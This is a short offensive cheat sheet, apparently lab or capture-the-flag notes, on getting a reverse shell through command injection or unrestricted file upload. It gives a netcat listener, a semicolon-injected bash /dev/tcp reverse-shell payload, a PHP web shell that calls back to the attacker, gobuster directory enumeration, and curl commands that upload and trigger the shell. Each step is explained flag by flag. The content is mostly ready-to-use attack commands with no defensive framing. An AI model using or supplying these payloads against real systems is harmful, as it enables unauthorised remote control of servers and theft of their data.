Reverse Shell

The web is vulnerable to command injection.

1. Set Listener

   nc -lvnp PORT
   

   • nc: The Netcat program (often called the "Swiss Army knife" of networking).
   • l: Listen (tells the utility to wait for a connection).
   • v: Verbose (tells you when someone has successfully connected).
   • n: Numeric (disables DNS resolution to speed up the process).
   • p 443: Port (the specific "door" you are opening on your machine).

2. Set Payload

   127.0.0.1; bash -c 'bash -i >& /dev/tcp/<IP-Listener>/<PORT-Listener> 0>&1'
   

   • ;: Semi-colon. It stops the first command and immediately starts the second one.
   • bash -c: Tells the system to execute everything inside the quotes as a terminal command.
   • bash -i: Starts an Interactive shell.
   • >&: Redirects both the standard output and error messages to the network.
   • /dev/tcp/IP/PORT: The "magic path" in Linux that redirects data to your specific IP and Port via the TCP protocol.
   • 0>&1: Redirects the input, allowing your keyboard to send commands back to the server.

The web unrestricted file upload

1. Set Listener

   nc -lvnp PORT
   

   • nc: The Netcat program (often called the "Swiss Army knife" of networking).
   • l: Listen (tells the utility to wait for a connection).
   • v: Verbose (tells you when someone has successfully connected).
   • n: Numeric (disables DNS resolution to speed up the process).
   • p 443: Port (the specific "door" you are opening on your machine).

2. Create a Script and upload

echo "<?php exec(\\"bash -c 'bash -i >& /dev/tcp/<IP-Listener>/<PORT-Listener> 0>&1'\\"); ?>" > shell.php

1. Directory Enumeration

   gobuster dir -u http://<IP-Victima>:<PORT-Victima> -w /usr/share/wordlists/dirb/common.txt -b -s 200,301
   

2. Upload file

   1. Check sintax

      $ curl -s http://<IP-Victim>:<PORT-Victim> | grep -C 5 "form"
      

      

      Watch parameters and analyze:

      “<form action=?”,“input Type=?”,”name=?”,”type=”submit” value=”?”>

   2. Upload file

      First line confirms Success.

       curl -X POST -F "[email protected]" -F "submit=Upload Your CV" <http://10.80.177.105:8082/index.php>
      

      

3. Activate/Execute

   curl http://<IP-Victim>:<PORT-Victim>/<DirectoryEnumertion>/<ScriptName.php>
   

   Got connect on listener